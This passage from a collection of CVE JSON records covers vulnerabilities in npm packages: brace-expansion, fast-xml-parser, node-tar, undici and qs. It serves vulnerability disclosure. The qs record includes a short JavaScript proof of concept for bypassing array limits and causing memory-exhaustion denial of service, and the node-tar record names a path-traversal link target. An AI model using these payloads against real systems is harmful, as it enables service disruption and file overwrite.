          "dateUpdated": "2026-02-05T14:31:38.349Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "brace-expansion",
          "vendor": "isaacs",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 5.0.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "@isaacs/brace-expansion is a hybrid CJS/ESM TypeScript fork of brace-expansion. Prior to version 5.0.1, @isaacs/brace-expansion is vulnerable to a denial of service (DoS) issue caused by unbounded brace range expansion. When an attacker provides a pattern containing repeated numeric brace ranges, the library attempts to eagerly generate every possible combination synchronously. Because the expansion grows exponentially, even a small input can consume excessive CPU and memory and may crash the Node.js process. This issue has been patched in version 5.0.1."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 9.2,
            "baseSeverity": "CRITICAL",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-1333",
              "description": "CWE-1333: Inefficient Regular Expression Complexity",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-04T21:51:17.198Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/isaacs/brace-expansion/security/advisories/GHSA-7h2j-956f-4vf2",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/isaacs/brace-expansion/security/advisories/GHSA-7h2j-956f-4vf2"
        }
      ],
      "source": {
        "advisory": "GHSA-7h2j-956f-4vf2",
        "discovery": "UNKNOWN"
      },
      "title": "Uncontrolled Resource Consumption in @isaacs/brace-expansion"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-25547",
    "datePublished": "2026-02-04T21:51:17.198Z",
    "dateReserved": "2026-02-02T19:59:47.376Z",
    "dateUpdated": "2026-02-05T14:31:38.349Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-25896",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-23T19:26:46.154155Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-23T19:29:10.187Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "fast-xml-parser",
          "vendor": "NaturalIntelligence",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 5.0.0, \u003c 5.3.5"
            },
            {
              "status": "affected",
              "version": "\u003e= 4.1.3, \u003c 4.5.4"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. From 4.1.3to before 5.3.5, a dot (.) in a DOCTYPE entity name is treated as a regex wildcard during entity replacement, allowing an attacker to shadow built-in XML entities (\u0026lt;, \u0026gt;, \u0026amp;, \u0026quot;, \u0026apos;) with arbitrary values. This bypasses entity encoding and leads to XSS when parsed output is rendered. This vulnerability is fixed in 5.3.5."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 9.3,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-185",
              "description": "CWE-185: Incorrect Regular Expression",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-02T19:11:31.673Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-m7jm-9gc2-mpf2",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-m7jm-9gc2-mpf2"
        },
        {
          "name": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/943ef0eb1b2d3284e72dd74f44a042ee9f07026e",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/943ef0eb1b2d3284e72dd74f44a042ee9f07026e"
        },
        {
          "name": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/ddcd0acf26ddd682cb0dc15a2bd6aa3b96bb1e69",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/ddcd0acf26ddd682cb0dc15a2bd6aa3b96bb1e69"
        },
        {
          "name": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.5",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.5"
        }
      ],
      "source": {
        "advisory": "GHSA-m7jm-9gc2-mpf2",
        "discovery": "UNKNOWN"
      },
      "title": "fast-xml-parser has an entity encoding bypass via regex injection in DOCTYPE entity names"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-25896",
    "datePublished": "2026-02-20T20:57:48.074Z",
    "dateReserved": "2026-02-06T21:08:39.130Z",
    "dateUpdated": "2026-03-02T19:11:31.673Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-29786",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-09T17:52:29.312917Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-09T18:26:34.057Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "node-tar",
          "vendor": "isaacs",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 7.5.10"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, tar can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This issue has been patched in version 7.5.10."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "LOCAL",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "LOW",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "HIGH",
            "userInteraction": "PASSIVE",
            "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L",
            "version": "4.0",
            "vulnAvailabilityImpact": "LOW",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "HIGH"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-59",
              "description": "CWE-59: Improper Link Resolution Before File Access (\u0027Link Following\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-07T15:32:22.748Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96"
        },
        {
          "name": "https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f"
        }
      ],
      "source": {
        "advisory": "GHSA-qffp-2rhf-9h96",
        "discovery": "UNKNOWN"
      },
      "title": "node-tar: Hardlink Path Traversal via Drive-Relative Linkpath"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-29786",
    "datePublished": "2026-03-07T15:32:22.748Z",
    "dateReserved": "2026-03-04T16:26:02.899Z",
    "dateUpdated": "2026-03-09T18:26:34.057Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-1526",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-13T18:04:06.608247Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-13T18:04:20.683Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://github.com/nodejs/undici/",
          "defaultStatus": "unaffected",
          "packageName": "undici",
          "product": "undici",
          "repo": "https://github.com/nodejs/undici/",
          "vendor": "undici",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 6.24.0; 7.0.0 \u003c 7.24.0"
            },
            {
              "status": "unaffected",
              "version": "6.24.0: 7.24.0"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "remediation developer",
          "value": "Matteo Collina"
        },
        {
          "lang": "en",
          "type": "remediation developer",
          "value": "Ulises Gasc\u00f3n"
        },
        {
          "lang": "en",
          "type": "finder",
          "value": "HO9"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eThe undici WebSocket client is vulnerable to a denial-of-service attack via unbounded memory consumption during permessage-deflate decompression. When a WebSocket connection negotiates the permessage-deflate extension, the client decompresses incoming compressed frames without enforcing any limit on the decompressed data size. A malicious WebSocket server can send a small compressed frame (a \"decompression bomb\") that expands to an extremely large size in memory, causing the Node.js process to exhaust available memory and crash or become unresponsive.\u003c/p\u003e\u003cp\u003eThe vulnerability exists in the\u0026nbsp;\u003ccode\u003ePerMessageDeflate.decompress()\u003c/code\u003e\u0026nbsp;method, which accumulates all decompressed chunks in memory and concatenates them into a single Buffer without checking whether the total size exceeds a safe threshold.\u003c/p\u003e"
            }
          ],
          "value": "The undici WebSocket client is vulnerable to a denial-of-service attack via unbounded memory consumption during permessage-deflate decompression. When a WebSocket connection negotiates the permessage-deflate extension, the client decompresses incoming compressed frames without enforcing any limit on the decompressed data size. A malicious WebSocket server can send a small compressed frame (a \"decompression bomb\") that expands to an extremely large size in memory, causing the Node.js process to exhaust available memory and crash or become unresponsive.\n\nThe vulnerability exists in the\u00a0PerMessageDeflate.decompress()\u00a0method, which accumulates all decompressed chunks in memory and concatenates them into a single Buffer without checking whether the total size exceeds a safe threshold."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-409",
              "description": "CWE-409 Improper handling of highly compressed data (data amplification)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-12T20:08:05.950Z",
        "orgId": "ce714d77-add3-4f53-aff5-83d477b104bb",
        "shortName": "openjs"
      },
      "references": [
        {
          "url": "https://github.com/nodejs/undici/security/advisories/GHSA-vrm6-8vpv-qv8q"
        },
        {
          "url": "https://hackerone.com/reports/3481206"
        },
        {
          "url": "https://cna.openjsf.org/security-advisories.html"
        },
        {
          "url": "https://datatracker.ietf.org/doc/html/rfc7692"
        }
      ],
      "source": {
        "advisory": "GHSA-vrm6-8vpv-qv8q",
        "discovery": "EXTERNAL"
      },
      "title": "undici is vulnerable to Unbounded Memory Consumption in undici WebSocket permessage-deflate Decompression",
      "x_generator": {
        "engine": "Vulnogram 1.0.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "ce714d77-add3-4f53-aff5-83d477b104bb",
    "assignerShortName": "openjs",
    "cveId": "CVE-2026-1526",
    "datePublished": "2026-03-12T20:08:05.950Z",
    "dateReserved": "2026-01-28T12:05:07.017Z",
    "dateUpdated": "2026-03-13T18:04:20.683Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-26960",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-20T15:29:17.653825Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-20T15:35:27.586Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "node-tar",
          "vendor": "isaacs",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 7.5.8"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "node-tar is a full-featured Tar for Node.js. When using default options in versions 7.5.7 and below, an attacker-controlled archive can create a hardlink inside the extraction directory that points to a file outside the extraction root, enabling arbitrary file read and write as the extracting user. Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive. This issue has been fixed in version 7.5.8."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "NONE",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-20T01:07:52.979Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx"
        },
        {
          "name": "https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384"
        },
        {
          "name": "https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f"
        }
      ],
      "source": {
        "advisory": "GHSA-83g3-92jg-28cx",
        "discovery": "UNKNOWN"
      },
      "title": "node-tar has Arbitrary File Read/Write via Hardlink Target Escape Through Symlink Chain in Extraction"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-26960",
    "datePublished": "2026-02-20T01:07:52.979Z",
    "dateReserved": "2026-02-16T22:20:28.611Z",
    "dateUpdated": "2026-02-20T15:35:27.586Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-2391",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-12T15:00:21.359233Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-12T15:00:40.388Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/ljharb/qs/security/advisories/GHSA-w7fw-mjwx-w883"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://npmjs.com/qs",
          "defaultStatus": "unaffected",
          "packageName": "qs",
          "repo": "https://github.com/ljharb/qs",
          "versions": [
            {
              "lessThanOrEqual": "6.14.1",
              "status": "affected",
              "version": "6.7.0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "### Summary\u003cbr\u003eThe `arrayLimit` option in qs does not enforce limits for comma-separated values when `comma: true` is enabled, allowing attackers to cause denial-of-service via memory exhaustion. This is a bypass of the array limit enforcement, similar to the bracket notation bypass addressed in GHSA-6rw7-vpxm-498p (CVE-2025-15284).\u003cbr\u003e\u003cbr\u003e### Details\u003cbr\u003eWhen the `comma` option is set to `true` (not the default, but configurable in applications), qs allows parsing comma-separated strings as arrays (e.g., `?param=a,b,c` becomes `[\u0027a\u0027, \u0027b\u0027, \u0027c\u0027]`). However, the limit check for `arrayLimit` (default: 20) and the optional throwOnLimitExceeded occur after the comma-handling logic in `parseArrayValue`, enabling a bypass. This permits creation of arbitrarily large arrays from a single parameter, leading to excessive memory allocation.\u003cbr\u003e\u003cbr\u003e**Vulnerable code** (lib/parse.js: lines ~40-50):\u003cbr\u003e```js\u003cbr\u003eif (val \u0026amp;\u0026amp; typeof val === \u0027string\u0027 \u0026amp;\u0026amp; options.comma \u0026amp;\u0026amp; val.indexOf(\u0027,\u0027) \u0026gt; -1) {\u003cbr\u003e\u0026nbsp; \u0026nbsp; return val.split(\u0027,\u0027);\u003cbr\u003e}\u003cbr\u003e\u003cbr\u003eif (options.throwOnLimitExceeded \u0026amp;\u0026amp; currentArrayLength \u0026gt;= options.arrayLimit) {\u003cbr\u003e\u0026nbsp; \u0026nbsp; throw new RangeError(\u0027Array limit exceeded. Only \u0027 + options.arrayLimit + \u0027 element\u0027 + (options.arrayLimit === 1 ? \u0027\u0027 : \u0027s\u0027) + \u0027 allowed in an array.\u0027);\u003cbr\u003e}\u003cbr\u003e\u003cbr\u003ereturn val;\u003cbr\u003e```\u003cbr\u003eThe `split(\u0027,\u0027)` returns the array immediately, skipping the subsequent limit check. Downstream merging via `utils.combine` does not prevent allocation, even if it marks overflows for sparse arrays.This discrepancy allows attackers to send a single parameter with millions of commas (e.g., `?param=,,,,,,,,...`), allocating massive arrays in memory without triggering limits. It bypasses the intent of `arrayLimit`, which is enforced correctly for indexed (`a[0]=`) and bracket (`a[]=`) notations (the latter fixed in v6.14.1 per GHSA-6rw7-vpxm-498p).\u003cbr\u003e\u003cbr\u003e### PoC\u003cbr\u003e**Test 1 - Basic bypass:**\u003cbr\u003e```\u003cbr\u003enpm install qs\u003cbr\u003e```\u003cbr\u003e\u003cbr\u003e```js\u003cbr\u003econst qs = require(\u0027qs\u0027);\u003cbr\u003e\u003cbr\u003econst payload = \u0027a=\u0027 + \u0027,\u0027.repeat(25);  // 26 elements after split (bypasses arrayLimit: 5)\u003cbr\u003econst options = { comma: true, arrayLimit: 5, throwOnLimitExceeded: true };\u003cbr\u003e\u003cbr\u003etry {\u003cbr\u003e\u0026nbsp; const result = qs.parse(payload, options);\u003cbr\u003e\u0026nbsp; console.log(result.a.length);  // Outputs: 26 (bypass successful)\u003cbr\u003e} catch (e) {\u003cbr\u003e\u0026nbsp; console.log(\u0027Limit enforced:\u0027, e.message);  // Not thrown\u003cbr\u003e}\u003cbr\u003e```\u003cbr\u003e**Configuration:**\u003cbr\u003e- `comma: true`\u003cbr\u003e- `arrayLimit: 5`\u003cbr\u003e- `throwOnLimitExceeded: true`\u003cbr\u003e\u003cbr\u003eExpected: Throws \"Array limit exceeded\" error.\u003cbr\u003eActual: Parses successfully, creating an array of length 26.\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e### Impact\u003cbr\u003eDenial of Service (DoS) via memory exhaustion.\u003cbr\u003e"
            }
          ],
          "value": "### Summary\nThe `arrayLimit` option in qs does not enforce limits for comma-separated values when `comma: true` is enabled, allowing attackers to cause denial-of-service via memory exhaustion. This is a bypass of the array limit enforcement, similar to the bracket notation bypass addressed in GHSA-6rw7-vpxm-498p (CVE-2025-15284).\n\n### Details\nWhen the `comma` option is set to `true` (not the default, but configurable in applications), qs allows parsing comma-separated strings as arrays (e.g., `?param=a,b,c` becomes `[\u0027a\u0027, \u0027b\u0027, \u0027c\u0027]`). However, the limit check for `arrayLimit` (default: 20) and the optional throwOnLimitExceeded occur after the comma-handling logic in `parseArrayValue`, enabling a bypass. This permits creation of arbitrarily large arrays from a single parameter, leading to excessive memory allocation.\n\n**Vulnerable code** (lib/parse.js: lines ~40-50):\n```js\nif (val \u0026\u0026 typeof val === \u0027string\u0027 \u0026\u0026 options.comma \u0026\u0026 val.indexOf(\u0027,\u0027) \u003e -1) {\n\u00a0 \u00a0 return val.split(\u0027,\u0027);\n}\n\nif (options.throwOnLimitExceeded \u0026\u0026 currentArrayLength \u003e= options.arrayLimit) {\n\u00a0 \u00a0 throw new RangeError(\u0027Array limit exceeded. Only \u0027 + options.arrayLimit + \u0027 element\u0027 + (options.arrayLimit === 1 ? \u0027\u0027 : \u0027s\u0027) + \u0027 allowed in an array.\u0027);\n}\n\nreturn val;\n```\nThe `split(\u0027,\u0027)` returns the array immediately, skipping the subsequent limit check. Downstream merging via `utils.combine` does not prevent allocation, even if it marks overflows for sparse arrays.This discrepancy allows attackers to send a single parameter with millions of commas (e.g., `?param=,,,,,,,,...`), allocating massive arrays in memory without triggering limits. It bypasses the intent of `arrayLimit`, which is enforced correctly for indexed (`a[0]=`) and bracket (`a[]=`) notations (the latter fixed in v6.14.1 per GHSA-6rw7-vpxm-498p).\n\n### PoC\n**Test 1 - Basic bypass:**\n```\nnpm install qs\n```\n\n```js\nconst qs = require(\u0027qs\u0027);\n\nconst payload = \u0027a=\u0027 + \u0027,\u0027.repeat(25);  // 26 elements after split (bypasses arrayLimit: 5)\nconst options = { comma: true, arrayLimit: 5, throwOnLimitExceeded: true };\n\ntry {\n\u00a0 const result = qs.parse(payload, options);\n\u00a0 console.log(result.a.length);  // Outputs: 26 (bypass successful)\n} catch (e) {\n\u00a0 console.log(\u0027Limit enforced:\u0027, e.message);  // Not thrown\n}\n```\n**Configuration:**\n- `comma: true`\n- `arrayLimit: 5`\n- `throwOnLimitExceeded: true`\n\nExpected: Throws \"Array limit exceeded\" error.\nActual: Parses successfully, creating an array of length 26.\n\n\n### Impact\nDenial of Service (DoS) via memory exhaustion."
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-130",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-130 Excessive Allocation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "attackComplexity": "LOW",
            "attackRequirements": "PRESENT",
            "attackVector": "NETWORK",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "exploitMaturity": "NOT_DEFINED",
            "privilegesRequired": "NONE",
            "providerUrgency": "NOT_DEFINED",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "valueDensity": "NOT_DEFINED",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "LOW",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE",
            "vulnerabilityResponseEffort": "NOT_DEFINED"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        },
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 3.7,
            "baseSeverity": "LOW",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-20",
              "description": "CWE-20 Improper Input Validation",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-12T17:32:05.953Z",
        "orgId": "7ffcee3d-2c14-4c3e-b844-86c6a321a158",
        "shortName": "harborist"
      },
      "references": [
        {
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://github.com/ljharb/qs/security/advisories/GHSA-w7fw-mjwx-w883"
        },
        {
          "tags": [
            "patch"
          ],
          "url": "https://github.com/ljharb/qs/commit/f6a7abff1f13d644db9b05fe4f2c98ada6bf8482"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "qs\u0027s arrayLimit bypass in comma parsing allows denial of service",
      "x_generator": {
        "engine": "Vulnogram 0.5.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "7ffcee3d-2c14-4c3e-b844-86c6a321a158",
    "assignerShortName": "harborist",
    "cveId": "CVE-2026-2391",
    "datePublished": "2026-02-12T04:39:42.914Z",
    "dateReserved": "2026-02-12T03:52:09.332Z",
    "dateUpdated": "2026-02-12T17:32:05.953Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-25128",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-01-30T15:40:07.179707Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-01-30T15:40:55.259Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
